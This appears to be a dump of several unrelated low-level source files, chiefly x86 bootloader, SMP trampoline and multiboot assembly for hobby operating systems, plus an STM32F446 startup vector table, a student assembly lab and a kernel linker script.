je check_a20_line_disabled # if equal wrap around happened which means a20 line is disabled
check_a20_line_enabled:
mov ax, 1
check_a20_line_disabled:
pop es
ret
a20_line_bios_enable:
mov ax, 0x2403 # check if method is supported
int 0x15
jc a20_line_bios_enable_ret
test ah, ah
jnz a20_line_bios_enable_ret
mov ax, 0x2401 # try to enable
int 0x15
a20_line_bios_enable_ret:
ret
a20_line_kcontroller_enable:
call a20_line_kcontroller_wait
mov al, 0xD1
out 0x64, al
call a20_line_kcontroller_wait
mov al, 0xDF
out 0x60, al
call a20_line_kcontroller_wait
ret
a20_line_kcontroller_wait:
in al, 0x64
test al, 0x2
jnz a20_line_kcontroller_wait
ret
a20_line_fast_enable:
in al, 0x92
test al, 0x2 # check if bit 1 is already on
jnz a20_line_fast_enable_ret
or al, 0x2
and al, 0xFE # guarantee bit 0 isn't written to (resets)
out 0x92, al
a20_line_fast_enable_ret:
ret
# errors routines:
error_enable_a20:
mov bx, offset error_enable_a20_string
jmp error_print
error_memory_map:
mov bx, offset error_memory_map_string
jmp error_print
error_vbe:
mov bx, offset error_vbe_string
jmp error_print
error_vbe_mode_not_found:
mov bx, offset error_vbe_mode_not_found_string
jmp error_print
# data structures:
# VESA info structure
vbe_info_structure:
vbe_info_structure_signature: .ascii "VBE2" # will later be changed to "VESA" once filled
vbe_info_structure_version: .word 0
vbe_info_structure_oem_str_ptr: .long 0 #.word 0 .word 0 # offset and segment
vbe_info_structure_capabilities: .long 0
vbe_info_structure_video_mode_ptr: .long 0 #.word 0 .word 0 # offset and segment
vbe_info_structure_software_rev: .word 0
vbe_info_structure_vendor: .long 0
vbe_info_structure_product_name: .long 0
vbe_info_structure_product_rev: .long 0
vbe_info_structure_reserved: .skip 222, 0
vbe_info_structure_oem_data: .skip 256, 0
# VESA mode info structure
vbe_mode_info_structure:
vbe_mode_info_structure_attributes: .word 0
.skip 16, 0 # not used here
vbe_mode_info_structure_width: .word 0
vbe_mode_info_structure_height: .word 0
.skip 3, 0 # not used here
vbe_mode_info_structure_bpp: .byte 0
.skip 1, 0
vbe_mode_info_structure_memory_model: .byte 0
.skip 12, 0 # not used here
vbe_mode_info_structure_framebuffer_addr: .long 0
.skip 212, 0 # not used here
# strings:
second_stage_string: .asciz "Booting second stage..."
error_enable_a20_string: .asciz "Failed to enable A20 line."
error_memory_map_string: .asciz "Failed to get memory map."
error_vbe_string: .asciz "VESA function not supported/failed."
error_vbe_mode_not_found_string: .asciz "VESA video mode specified in config not found."
|
mpeco/rust-os | 3,381 | bootloader/src/asm/stage1.s | .section .first_stage, "awx"
.global stage1_start
.code16
stage1_start:
cld # clear direction flag
# initialize segment registers
xor ax, ax
mov es, ax
mov fs, ax
mov gs, ax
mov ds, ax
mov ss, ax
mov sp, 0x7C00 # initialize the stack
mov [drive_code], dl # stores drive code
mov si, offset first_stage_string
call bios_println
set_bios_long_mode:
mov ax, 0xEC00
mov bx, 2
int 0x15
check_int13h_extensions:
mov ah, 0x41
mov bx, 0x55AA
int 0x13
jc error_int13h_extensions_not_supported
load_rest_of_bootloader:
mov bx, 0x7E00 # 0x07C0:0x0200 (512 bytes from start)
mov word ptr [dap_transfer_buffer], bx
mov ax, offset end_addr_bootloader
sub ax, bx # end - start
add ax, 511 # align up
shr ax, 9 # divide by 512
mov word ptr [dap_num_sectors], ax
mov word ptr [dap_starting_lba], 1 # FIXME: In case MBR chainloading
mov si, offset dap
mov ah, 0x42
mov dl, [drive_code] # restore drive code
int 0x13
jc error_load_rest_of_bootloader
jmp stage2_start
# print routines:
# string in si
bios_println:
call bios_print
mov al, 0xA # line Feed
call bios_write_character
mov al, 0xD # carriage Return
call bios_write_character
ret
# string in si
bios_print:
cld
bios_print_loop:
lodsb
test al, al
jz bios_print_return
call bios_write_character
jmp bios_print_loop
bios_print_return:
ret
# char in al
bios_write_character:
mov ah, 0xE
int 0x10
ret
# errors routines:
# string in bx
error_print:
mov si, offset error_string
call bios_print
mov si, bx
call bios_println
spin:
jmp spin
error_cpuid_not_supported:
mov bx, offset error_cpuid_not_supported_string
jmp error_print
error_longmode_not_supported:
mov bx, offset error_longmode_not_supported_string
jmp error_print
error_int13h_extensions_not_supported:
mov bx, offset error_int13h_extensions_string
jmp error_print
error_load_rest_of_bootloader:
mov bx, offset error_load_rest_of_bootloader_string
jmp error_print
# data structures:
# global descriptor table descriptor
gdt_descriptor:
.word gdt_end - gdt - 1 # size of gdt
.long gdt # start of gdt
# global descriptor table
gdt:
.quad 0
# code descriptor
.byte 0xff
.byte 0xff
.byte 0
.byte 0
.byte 0
.byte 0x9a
.byte 0xcf
.byte 0
# data descriptor
.byte 0xff
.byte 0xff
.byte 0
.byte 0
.byte 0
.byte 0x92
.byte 0xcf
.byte 0
gdt_end:
# disk address packet
dap:
.byte 0x10 # size of packet
.byte 0x0 # unused
dap_num_sectors:
.word 0x0 # number of sectors to transfer
dap_transfer_buffer: # segment:offset
.word 0x0 # offset
.word 0x0 # segment
dap_starting_lba:
.quad 0x0
# store drive code from dl
drive_code: .byte 0
# strings:
first_stage_string: .asciz "Booting first stage..."
error_string: .asciz "ERROR: "
error_cpuid_not_supported_string: .asciz "CPUID not supported by CPU."
error_longmode_not_supported_string: .asciz "Long Mode not supported by CPU."
error_int13h_extensions_string: .asciz "INT13h Extensions not supported."
error_load_rest_of_bootloader_string: .asciz "Failed to load rest of bootloader."
# fill to 512 bytes
.org 510
.word 0xAA55 # bootable disk signature
|
mpeco/rust-os | 2,185 | kernel/src/x86_64/cpu/smp/asm/trampoline.s | # will be loaded on address 0x8000
.code16
trampoline_start:
cli
cld
xor ax, ax
mov ds, ax
# load gloal descriptor table
mov byte ptr [0x8034], 0xCF
lgdt [0x8020]
# enter protected mode
mov eax, cr0
or al, 1
mov cr0, eax
# jump to protected mode
ljmp 0x8, 0x8040
.org 0x20 # fill until 0x8020
# global descriptor table descriptor
gdt_descriptor_0x8020:
.word gdt_end - gdt - 1 # size of gdt
.long 0x8026 # start of gdt
.org 0x26 # 0x8026, directive to make sure address is correct when assembling
# global descriptor table
gdt:
.quad 0
# code descriptor
.byte 0xFF
.byte 0xFF
.byte 0
.byte 0
.byte 0
.byte 0x9A
.org 0x34 # 0x8034, directive to make sure address is correct when assembling
.byte 0
.byte 0
# data descriptor
.byte 0xFF
.byte 0xFF
.byte 0
.byte 0
.byte 0
.byte 0x92
.byte 0xCF
.byte 0
gdt_end:
.code32
.org 0x40 # fill until 0x8040
protected_mode_0x8040:
# move PML4 table address to cr3
mov eax, [0x8080]
mov cr3, eax
# flip PAE bit in cr4
mov eax, cr4
or eax, 0x20
mov cr4, eax
# set long mode and NXE bit
mov ecx, 0xC0000080
rdmsr
or eax, 0x900
wrmsr
# enable paging
mov eax, cr0
or eax, 0x80000000
mov cr0, eax
# update gdt for long mode and load it again
mov byte ptr [0x8034], 0xAF
lgdt [0x8020]
# jump to long mode
ljmp 0x8, 0x8100
.org 0x80 # fill until 0x8080
pml4_addr_0x8080: # will be filled by kernel
.quad 0x0
init_ap_fn_addr_0x8088: # will be filled by kernel
.quad 0x0
stack_top_addr_ptr_0x8090: # will be filled by kernel
.quad 0x0
trampoline_lock_addr_0x8098: # will be filled by kernel
.quad 0x0
.code64
.org 0x100 # fill until 0x8100
long_mode_0x8100:
mov rax, [0x8098]
trampoline_spin_loop: # wait for bsp
pause
cmp byte ptr [rax], 0
jnz trampoline_spin_loop
# setup stack
mov rax, [0x8090]
mov rsp, [rax]
# jump to "init_ap" in smp/mod.rs with stack top addr as 1st param (rdi)
mov rdi, rsp
mov rax, [0x8088]
jmp rax
trampoline_end:
|
mrkayaalp/ad7708 | 24,397 | Core/Startup/startup_stm32f446retx.s | /**
******************************************************************************
* @file startup_stm32f446xx.s
* @author MCD Application Team
* @brief STM32F446xx Devices vector table for GCC based toolchains.
* This module performs:
* - Set the initial SP
* - Set the initial PC == Reset_Handler,
* - Set the vector table entries with the exceptions ISR address
* - Branches to main in the C library (which eventually
* calls main()).
* After Reset the Cortex-M4 processor is in Thread mode,
* priority is Privileged, and the Stack is set to Main.
******************************************************************************
* @attention
*
* Copyright (c) 2017 STMicroelectronics.
* All rights reserved.
*
* This software is licensed under terms that can be found in the LICENSE file
* in the root directory of this software component.
* If no LICENSE file comes with this software, it is provided AS-IS.
*
******************************************************************************
*/
.syntax unified
.cpu cortex-m4
.fpu softvfp
.thumb
.global g_pfnVectors
.global Default_Handler
/* start address for the initialization values of the .data section.
defined in linker script */
.word _sidata
/* start address for the .data section. defined in linker script */
.word _sdata
/* end address for the .data section. defined in linker script */
.word _edata
/* start address for the .bss section. defined in linker script */
.word _sbss
/* end address for the .bss section. defined in linker script */
.word _ebss
/* stack used for SystemInit_ExtMemCtl; always internal RAM used */
/**
* @brief This is the code that gets called when the processor first
* starts execution following a reset event. Only the absolutely
* necessary set is performed, after which the application
* supplied main() routine is called.
* @param None
* @retval : None
*/
.section .text.Reset_Handler
.weak Reset_Handler
.type Reset_Handler, %function
Reset_Handler:
ldr sp, =_estack /* set stack pointer */
/* Copy the data segment initializers from flash to SRAM */
ldr r0, =_sdata
ldr r1, =_edata
ldr r2, =_sidata
movs r3, #0
b LoopCopyDataInit
CopyDataInit:
ldr r4, [r2, r3]
str r4, [r0, r3]
adds r3, r3, #4
LoopCopyDataInit:
adds r4, r0, r3
cmp r4, r1
bcc CopyDataInit
/* Zero fill the bss segment. */
ldr r2, =_sbss
ldr r4, =_ebss
movs r3, #0
b LoopFillZerobss
FillZerobss:
str r3, [r2]
adds r2, r2, #4
LoopFillZerobss:
cmp r2, r4
bcc FillZerobss
/* Call the clock system initialization function.*/
bl SystemInit
/* Call static constructors */
bl __libc_init_array
/* Call the application's entry point.*/
bl main
bx lr
.size Reset_Handler, .-Reset_Handler
/**
* @brief This is the code that gets called when the processor receives an
* unexpected interrupt. This simply enters an infinite loop, preserving
* the system state for examination by a debugger.
* @param None
* @retval None
*/
.section .text.Default_Handler,"ax",%progbits
Default_Handler:
Infinite_Loop:
b Infinite_Loop
.size Default_Handler, .-Default_Handler
/******************************************************************************
*
* The minimal vector table for a Cortex M3. Note that the proper constructs
* must be placed on this to ensure that it ends up at physical address
* 0x0000.0000.
*
*******************************************************************************/
.section .isr_vector,"a",%progbits
.type g_pfnVectors, %object
.size g_pfnVectors, .-g_pfnVectors
g_pfnVectors:
.word _estack
.word Reset_Handler
.word NMI_Handler
.word HardFault_Handler
.word MemManage_Handler
.word BusFault_Handler
.word UsageFault_Handler
.word 0
.word 0
.word 0
.word 0
.word SVC_Handler
.word DebugMon_Handler
.word 0
.word PendSV_Handler
.word SysTick_Handler
/* External Interrupts */
.word WWDG_IRQHandler /* Window WatchDog */
.word PVD_IRQHandler /* PVD through EXTI Line detection */
.word TAMP_STAMP_IRQHandler /* Tamper and TimeStamps through the EXTI line */
.word RTC_WKUP_IRQHandler /* RTC Wakeup through the EXTI line */
.word FLASH_IRQHandler /* FLASH */
.word RCC_IRQHandler /* RCC */
.word EXTI0_IRQHandler /* EXTI Line0 */
.word EXTI1_IRQHandler /* EXTI Line1 */
.word EXTI2_IRQHandler /* EXTI Line2 */
.word EXTI3_IRQHandler /* EXTI Line3 */
.word EXTI4_IRQHandler /* EXTI Line4 */
.word DMA1_Stream0_IRQHandler /* DMA1 Stream 0 */
.word DMA1_Stream1_IRQHandler /* DMA1 Stream 1 */
.word DMA1_Stream2_IRQHandler /* DMA1 Stream 2 */
.word DMA1_Stream3_IRQHandler /* DMA1 Stream 3 */
.word DMA1_Stream4_IRQHandler /* DMA1 Stream 4 */
.word DMA1_Stream5_IRQHandler /* DMA1 Stream 5 */
.word DMA1_Stream6_IRQHandler /* DMA1 Stream 6 */
.word ADC_IRQHandler /* ADC1, ADC2 and ADC3s */
.word CAN1_TX_IRQHandler /* CAN1 TX */
.word CAN1_RX0_IRQHandler /* CAN1 RX0 */
.word CAN1_RX1_IRQHandler /* CAN1 RX1 */
.word CAN1_SCE_IRQHandler /* CAN1 SCE */
.word EXTI9_5_IRQHandler /* External Line[9:5]s */
.word TIM1_BRK_TIM9_IRQHandler /* TIM1 Break and TIM9 */
.word TIM1_UP_TIM10_IRQHandler /* TIM1 Update and TIM10 */
.word TIM1_TRG_COM_TIM11_IRQHandler /* TIM1 Trigger and Commutation and TIM11 */
.word TIM1_CC_IRQHandler /* TIM1 Capture Compare */
.word TIM2_IRQHandler /* TIM2 */
.word TIM3_IRQHandler /* TIM3 */
.word TIM4_IRQHandler /* TIM4 */
.word I2C1_EV_IRQHandler /* I2C1 Event */
.word I2C1_ER_IRQHandler /* I2C1 Error */
.word I2C2_EV_IRQHandler /* I2C2 Event */
.word I2C2_ER_IRQHandler /* I2C2 Error */
.word SPI1_IRQHandler /* SPI1 */
.word SPI2_IRQHandler /* SPI2 */
.word USART1_IRQHandler /* USART1 */
.word USART2_IRQHandler /* USART2 */
.word USART3_IRQHandler /* USART3 */
.word EXTI15_10_IRQHandler /* External Line[15:10]s */
.word RTC_Alarm_IRQHandler /* RTC Alarm (A and B) through EXTI Line */
.word OTG_FS_WKUP_IRQHandler /* USB OTG FS Wakeup through EXTI line */
.word TIM8_BRK_TIM12_IRQHandler /* TIM8 Break and TIM12 */
.word TIM8_UP_TIM13_IRQHandler /* TIM8 Update and TIM13 */
.word TIM8_TRG_COM_TIM14_IRQHandler /* TIM8 Trigger and Commutation and TIM14 */
.word TIM8_CC_IRQHandler /* TIM8 Capture Compare */
.word DMA1_Stream7_IRQHandler /* DMA1 Stream7 */
.word FMC_IRQHandler /* FMC */
.word SDIO_IRQHandler /* SDIO */
.word TIM5_IRQHandler /* TIM5 */
.word SPI3_IRQHandler /* SPI3 */
.word UART4_IRQHandler /* UART4 */
.word UART5_IRQHandler /* UART5 */
.word TIM6_DAC_IRQHandler /* TIM6 and DAC1&2 underrun errors */
.word TIM7_IRQHandler /* TIM7 */
.word DMA2_Stream0_IRQHandler /* DMA2 Stream 0 */
.word DMA2_Stream1_IRQHandler /* DMA2 Stream 1 */
.word DMA2_Stream2_IRQHandler /* DMA2 Stream 2 */
.word DMA2_Stream3_IRQHandler /* DMA2 Stream 3 */
.word DMA2_Stream4_IRQHandler /* DMA2 Stream 4 */
.word 0 /* Reserved */
.word 0 /* Reserved */
.word CAN2_TX_IRQHandler /* CAN2 TX */
.word CAN2_RX0_IRQHandler /* CAN2 RX0 */
.word CAN2_RX1_IRQHandler /* CAN2 RX1 */
.word CAN2_SCE_IRQHandler /* CAN2 SCE */
.word OTG_FS_IRQHandler /* USB OTG FS */
.word DMA2_Stream5_IRQHandler /* DMA2 Stream 5 */
.word DMA2_Stream6_IRQHandler /* DMA2 Stream 6 */
.word DMA2_Stream7_IRQHandler /* DMA2 Stream 7 */
.word USART6_IRQHandler /* USART6 */
.word I2C3_EV_IRQHandler /* I2C3 event */
.word I2C3_ER_IRQHandler /* I2C3 error */
.word OTG_HS_EP1_OUT_IRQHandler /* USB OTG HS End Point 1 Out */
.word OTG_HS_EP1_IN_IRQHandler /* USB OTG HS End Point 1 In */
.word OTG_HS_WKUP_IRQHandler /* USB OTG HS Wakeup through EXTI */
.word OTG_HS_IRQHandler /* USB OTG HS */
.word DCMI_IRQHandler /* DCMI */
.word 0 /* Reserved */
.word 0 /* Reserved */
.word FPU_IRQHandler /* FPU */
.word 0 /* Reserved */
.word 0 /* Reserved */
.word SPI4_IRQHandler /* SPI4 */
.word 0 /* Reserved */
.word 0 /* Reserved */
.word SAI1_IRQHandler /* SAI1 */
.word 0 /* Reserved */
.word 0 /* Reserved */
.word 0 /* Reserved */
.word SAI2_IRQHandler /* SAI2 */
.word QUADSPI_IRQHandler /* QuadSPI */
.word CEC_IRQHandler /* CEC */
.word SPDIF_RX_IRQHandler /* SPDIF RX */
.word FMPI2C1_EV_IRQHandler /* FMPI2C 1 Event */
.word FMPI2C1_ER_IRQHandler /* FMPI2C 1 Error */
/*******************************************************************************
*
* Provide weak aliases for each Exception handler to the Default_Handler.
* As they are weak aliases, any function with the same name will override
* this definition.
*
*******************************************************************************/
.weak NMI_Handler
.thumb_set NMI_Handler,Default_Handler
.weak HardFault_Handler
.thumb_set HardFault_Handler,Default_Handler
.weak MemManage_Handler
.thumb_set MemManage_Handler,Default_Handler
.weak BusFault_Handler
.thumb_set BusFault_Handler,Default_Handler
.weak UsageFault_Handler
.thumb_set UsageFault_Handler,Default_Handler
.weak SVC_Handler
.thumb_set SVC_Handler,Default_Handler
.weak DebugMon_Handler
.thumb_set DebugMon_Handler,Default_Handler
.weak PendSV_Handler
.thumb_set PendSV_Handler,Default_Handler
.weak SysTick_Handler
.thumb_set SysTick_Handler,Default_Handler
.weak WWDG_IRQHandler
.thumb_set WWDG_IRQHandler,Default_Handler
.weak PVD_IRQHandler
.thumb_set PVD_IRQHandler,Default_Handler
.weak TAMP_STAMP_IRQHandler
.thumb_set TAMP_STAMP_IRQHandler,Default_Handler
.weak RTC_WKUP_IRQHandler
.thumb_set RTC_WKUP_IRQHandler,Default_Handler
.weak FLASH_IRQHandler
.thumb_set FLASH_IRQHandler,Default_Handler
.weak RCC_IRQHandler
.thumb_set RCC_IRQHandler,Default_Handler
.weak EXTI0_IRQHandler
.thumb_set EXTI0_IRQHandler,Default_Handler
.weak EXTI1_IRQHandler
.thumb_set EXTI1_IRQHandler,Default_Handler
.weak EXTI2_IRQHandler
.thumb_set EXTI2_IRQHandler,Default_Handler
.weak EXTI3_IRQHandler
.thumb_set EXTI3_IRQHandler,Default_Handler
.weak EXTI4_IRQHandler
.thumb_set EXTI4_IRQHandler,Default_Handler
.weak DMA1_Stream0_IRQHandler
.thumb_set DMA1_Stream0_IRQHandler,Default_Handler
.weak DMA1_Stream1_IRQHandler
.thumb_set DMA1_Stream1_IRQHandler,Default_Handler
.weak DMA1_Stream2_IRQHandler
.thumb_set DMA1_Stream2_IRQHandler,Default_Handler
.weak DMA1_Stream3_IRQHandler
.thumb_set DMA1_Stream3_IRQHandler,Default_Handler
.weak DMA1_Stream4_IRQHandler
.thumb_set DMA1_Stream4_IRQHandler,Default_Handler
.weak DMA1_Stream5_IRQHandler
.thumb_set DMA1_Stream5_IRQHandler,Default_Handler
.weak DMA1_Stream6_IRQHandler
.thumb_set DMA1_Stream6_IRQHandler,Default_Handler
.weak ADC_IRQHandler
.thumb_set ADC_IRQHandler,Default_Handler
.weak CAN1_TX_IRQHandler
.thumb_set CAN1_TX_IRQHandler,Default_Handler
.weak CAN1_RX0_IRQHandler
.thumb_set CAN1_RX0_IRQHandler,Default_Handler
.weak CAN1_RX1_IRQHandler
.thumb_set CAN1_RX1_IRQHandler,Default_Handler
.weak CAN1_SCE_IRQHandler
.thumb_set CAN1_SCE_IRQHandler,Default_Handler
.weak EXTI9_5_IRQHandler
.thumb_set EXTI9_5_IRQHandler,Default_Handler
.weak TIM1_BRK_TIM9_IRQHandler
.thumb_set TIM1_BRK_TIM9_IRQHandler,Default_Handler
.weak TIM1_UP_TIM10_IRQHandler
.thumb_set TIM1_UP_TIM10_IRQHandler,Default_Handler
.weak TIM1_TRG_COM_TIM11_IRQHandler
.thumb_set TIM1_TRG_COM_TIM11_IRQHandler,Default_Handler
.weak TIM1_CC_IRQHandler
.thumb_set TIM1_CC_IRQHandler,Default_Handler
.weak TIM2_IRQHandler
.thumb_set TIM2_IRQHandler,Default_Handler
.weak TIM3_IRQHandler
.thumb_set TIM3_IRQHandler,Default_Handler
.weak TIM4_IRQHandler
.thumb_set TIM4_IRQHandler,Default_Handler
.weak I2C1_EV_IRQHandler
.thumb_set I2C1_EV_IRQHandler,Default_Handler
.weak I2C1_ER_IRQHandler
.thumb_set I2C1_ER_IRQHandler,Default_Handler
.weak I2C2_EV_IRQHandler
.thumb_set I2C2_EV_IRQHandler,Default_Handler
.weak I2C2_ER_IRQHandler
.thumb_set I2C2_ER_IRQHandler,Default_Handler
.weak SPI1_IRQHandler
.thumb_set SPI1_IRQHandler,Default_Handler
.weak SPI2_IRQHandler
.thumb_set SPI2_IRQHandler,Default_Handler
.weak USART1_IRQHandler
.thumb_set USART1_IRQHandler,Default_Handler
.weak USART2_IRQHandler
.thumb_set USART2_IRQHandler,Default_Handler
.weak USART3_IRQHandler
.thumb_set USART3_IRQHandler,Default_Handler
.weak EXTI15_10_IRQHandler
.thumb_set EXTI15_10_IRQHandler,Default_Handler
.weak RTC_Alarm_IRQHandler
.thumb_set RTC_Alarm_IRQHandler,Default_Handler
.weak OTG_FS_WKUP_IRQHandler
.thumb_set OTG_FS_WKUP_IRQHandler,Default_Handler
.weak TIM8_BRK_TIM12_IRQHandler
.thumb_set TIM8_BRK_TIM12_IRQHandler,Default_Handler
.weak TIM8_UP_TIM13_IRQHandler
.thumb_set TIM8_UP_TIM13_IRQHandler,Default_Handler
.weak TIM8_TRG_COM_TIM14_IRQHandler
.thumb_set TIM8_TRG_COM_TIM14_IRQHandler,Default_Handler
.weak TIM8_CC_IRQHandler
.thumb_set TIM8_CC_IRQHandler,Default_Handler
.weak DMA1_Stream7_IRQHandler
.thumb_set DMA1_Stream7_IRQHandler,Default_Handler
.weak FMC_IRQHandler
.thumb_set FMC_IRQHandler,Default_Handler
.weak SDIO_IRQHandler
.thumb_set SDIO_IRQHandler,Default_Handler
.weak TIM5_IRQHandler
.thumb_set TIM5_IRQHandler,Default_Handler
.weak SPI3_IRQHandler
.thumb_set SPI3_IRQHandler,Default_Handler
.weak UART4_IRQHandler
.thumb_set UART4_IRQHandler,Default_Handler
.weak UART5_IRQHandler
.thumb_set UART5_IRQHandler,Default_Handler
.weak TIM6_DAC_IRQHandler
.thumb_set TIM6_DAC_IRQHandler,Default_Handler
.weak TIM7_IRQHandler
.thumb_set TIM7_IRQHandler,Default_Handler
.weak DMA2_Stream0_IRQHandler
.thumb_set DMA2_Stream0_IRQHandler,Default_Handler
.weak DMA2_Stream1_IRQHandler
.thumb_set DMA2_Stream1_IRQHandler,Default_Handler
.weak DMA2_Stream2_IRQHandler
.thumb_set DMA2_Stream2_IRQHandler,Default_Handler
.weak DMA2_Stream3_IRQHandler
.thumb_set DMA2_Stream3_IRQHandler,Default_Handler
.weak DMA2_Stream4_IRQHandler
.thumb_set DMA2_Stream4_IRQHandler,Default_Handler
.weak CAN2_TX_IRQHandler
.thumb_set CAN2_TX_IRQHandler,Default_Handler
.weak CAN2_RX0_IRQHandler
.thumb_set CAN2_RX0_IRQHandler,Default_Handler
.weak CAN2_RX1_IRQHandler
.thumb_set CAN2_RX1_IRQHandler,Default_Handler
.weak CAN2_SCE_IRQHandler
.thumb_set CAN2_SCE_IRQHandler,Default_Handler
.weak OTG_FS_IRQHandler
.thumb_set OTG_FS_IRQHandler,Default_Handler
.weak DMA2_Stream5_IRQHandler
.thumb_set DMA2_Stream5_IRQHandler,Default_Handler
.weak DMA2_Stream6_IRQHandler
.thumb_set DMA2_Stream6_IRQHandler,Default_Handler
.weak DMA2_Stream7_IRQHandler
.thumb_set DMA2_Stream7_IRQHandler,Default_Handler
.weak USART6_IRQHandler
.thumb_set USART6_IRQHandler,Default_Handler
.weak I2C3_EV_IRQHandler
.thumb_set I2C3_EV_IRQHandler,Default_Handler
.weak I2C3_ER_IRQHandler
.thumb_set I2C3_ER_IRQHandler,Default_Handler
.weak OTG_HS_EP1_OUT_IRQHandler
.thumb_set OTG_HS_EP1_OUT_IRQHandler,Default_Handler
.weak OTG_HS_EP1_IN_IRQHandler
.thumb_set OTG_HS_EP1_IN_IRQHandler,Default_Handler
.weak OTG_HS_WKUP_IRQHandler
.thumb_set OTG_HS_WKUP_IRQHandler,Default_Handler
.weak OTG_HS_IRQHandler
.thumb_set OTG_HS_IRQHandler,Default_Handler
.weak DCMI_IRQHandler
.thumb_set DCMI_IRQHandler,Default_Handler
.weak FPU_IRQHandler
.thumb_set FPU_IRQHandler,Default_Handler
.weak SPI4_IRQHandler
.thumb_set SPI4_IRQHandler,Default_Handler
.weak SAI1_IRQHandler
.thumb_set SAI1_IRQHandler,Default_Handler
.weak SAI2_IRQHandler
.thumb_set SAI2_IRQHandler,Default_Handler
.weak QUADSPI_IRQHandler
.thumb_set QUADSPI_IRQHandler,Default_Handler
.weak CEC_IRQHandler
.thumb_set CEC_IRQHandler,Default_Handler
.weak SPDIF_RX_IRQHandler
.thumb_set SPDIF_RX_IRQHandler,Default_Handler
.weak FMPI2C1_EV_IRQHandler
.thumb_set FMPI2C1_EV_IRQHandler,Default_Handler
.weak FMPI2C1_ER_IRQHandler
.thumb_set FMPI2C1_ER_IRQHandler,Default_Handler
|
MrSnickersRUS/NSTUlab2 | 1,423 | lab2_task3/main.s | section .data
array dd 1, 2, 3, 5, 2
array_len equ ($ - array) / 4
result_msg db "Количество неубывающих серий: ", 0
result_msg_len equ $ - result_msg
newline db 10, 0
newline_len equ $ - newline
buffer times 11 db 0
section .text
global _start
_start:
mov ecx, array_len
cmp ecx, 1
jle .special_cases
; Основная логика
mov esi, array
mov ebx, 1 ; Первая серия
mov ecx, array_len
dec ecx
.compare_loop:
mov eax, [esi]
mov edx, [esi + 4]
cmp eax, edx
jle .next_element
inc ebx ; Новая серия
.next_element:
add esi, 4
loop .compare_loop
jmp .print_result
.special_cases:
mov ebx, ecx ; 0 или 1
jmp .print_result
.print_result:
; Вывод сообщения
mov eax, 4
mov ebx, 1
mov ecx, result_msg
mov edx, result_msg_len
int 0x80
; Вывод числа
mov eax, ebx
call print_uint
; Вывод перевода строки
mov eax, 4
mov ebx, 1
mov ecx, newline
mov edx, newline_len
int 0x80
.exit:
mov eax, 1
xor ebx, ebx
int 0x80
print_uint:
mov edi, buffer + 10
mov byte [edi], 0
mov ecx, 10
.convert_loop:
dec edi
xor edx, edx
div ecx
add dl, '0'
mov [edi], dl
test eax, eax
jnz .convert_loop
mov eax, 4
mov ebx, 1
mov ecx, edi
mov edx, buffer + 10
sub edx, edi
int 0x80
ret |
MukioXun/OSKernel_test | 2,386 | AstrancE/modules/axhal/linker.lds.S | OUTPUT_ARCH(%ARCH%)
BASE_ADDRESS = %KERNEL_BASE%;
ENTRY(_start)
SECTIONS
{
. = BASE_ADDRESS;
_skernel = .;
.text : ALIGN(4K) {
_stext = .;
*(.text.boot)
*(.text .text.*)
. = ALIGN(4K);
_etext = .;
}
_srodata = .;
.rodata : ALIGN(4K) {
*(.rodata .rodata.*)
*(.srodata .srodata.*)
*(.sdata2 .sdata2.*)
}
.init_array : ALIGN(0x10) {
__init_array_start = .;
*(.init_array .init_array.*)
__init_array_end = .;
}
. = ALIGN(4K);
_erodata = .;
.trampoline : ALIGN(4K) {
_strampoline = .;
*(.trampoline.*)
. = ALIGN(4K);
_etrampoline = .;
}
.data : ALIGN(4K) {
_sdata = .;
*(.data.boot_page_table)
. = ALIGN(4K);
*(.data .data.*)
*(.sdata .sdata.*)
*(.got .got.*)
}
.tdata : ALIGN(0x10) {
_stdata = .;
*(.tdata .tdata.*)
_etdata = .;
}
.tbss : ALIGN(0x10) {
_stbss = .;
*(.tbss .tbss.*)
*(.tcommon)
_etbss = .;
}
. = ALIGN(4K);
_percpu_start = .;
_percpu_end = _percpu_start + SIZEOF(.percpu);
.percpu 0x0 : AT(_percpu_start) {
_percpu_load_start = .;
*(.percpu .percpu.*)
_percpu_load_end = .;
. = _percpu_load_start + ALIGN(64) * (%SMP% + 1); // add 1 since CPU hartid starts from 1
}
. = _percpu_end;
. = ALIGN(4K);
_edata = .;
.bss : AT(.) ALIGN(4K) {
boot_stack = .;
*(.bss.stack)
. = ALIGN(4K);
boot_stack_top = .;
_sbss = .;
*(.bss .bss.*)
*(.sbss .sbss.*)
*(COMMON)
. = ALIGN(4K);
_ebss = .;
}
_ekernel = .;
/DISCARD/ : {
*(.comment) *(.gnu*) *(.note*) *(.eh_frame*)
}
}
SECTIONS {
linkme_IRQ : { *(linkme_IRQ) }
linkm2_IRQ : { *(linkm2_IRQ) }
linkme_PAGE_FAULT : { *(linkme_PAGE_FAULT) }
linkm2_PAGE_FAULT : { *(linkm2_PAGE_FAULT) }
linkme_SYSCALL : { *(linkme_SYSCALL) }
linkm2_SYSCALL : { *(linkm2_SYSCALL) }
linkme_PRE_TRAP : { *(linkme_PRE_TRAP) }
linkm2_PRE_TRAP : { *(linkm2_PRE_TRAP) }
linkme_POST_TRAP : { *(linkme_POST_TRAP) }
linkm2_POST_TRAP : { *(linkm2_POST_TRAP) }
axns_resource : { *(axns_resource) }
}
INSERT AFTER .tbss;
|
MukioXun/OSKernel_test | 4,325 | AstrancE/modules/axhal/src/platform/x86_pc/multiboot.S | # Bootstrapping from 32-bit with the Multiboot specification.
# See https://www.gnu.org/software/grub/manual/multiboot/multiboot.html
.section .text.boot
.code32
.global _start
_start:
mov edi, eax # arg1: magic: 0x2BADB002
mov esi, ebx # arg2: multiboot info
jmp bsp_entry32
.balign 4
.type multiboot_header, STT_OBJECT
multiboot_header:
.int {mb_hdr_magic} # magic: 0x1BADB002
.int {mb_hdr_flags} # flags
.int -({mb_hdr_magic} + {mb_hdr_flags}) # checksum
.int multiboot_header - {offset} # header_addr
.int _skernel - {offset} # load_addr
.int _edata - {offset} # load_end
.int _ebss - {offset} # bss_end_addr
.int _start - {offset} # entry_addr
# Common code in 32-bit, prepare states to enter 64-bit.
.macro ENTRY32_COMMON
# set data segment selectors
mov ax, 0x18
mov ss, ax
mov ds, ax
mov es, ax
mov fs, ax
mov gs, ax
# set PAE, PGE bit in CR4
mov eax, {cr4}
mov cr4, eax
# load the temporary page table
lea eax, [.Ltmp_pml4 - {offset}]
mov cr3, eax
# set LME, NXE bit in IA32_EFER
mov ecx, {efer_msr}
mov edx, 0
mov eax, {efer}
wrmsr
# set protected mode, write protect, paging bit in CR0
mov eax, {cr0}
mov cr0, eax
.endm
# Common code in 64-bit
.macro ENTRY64_COMMON
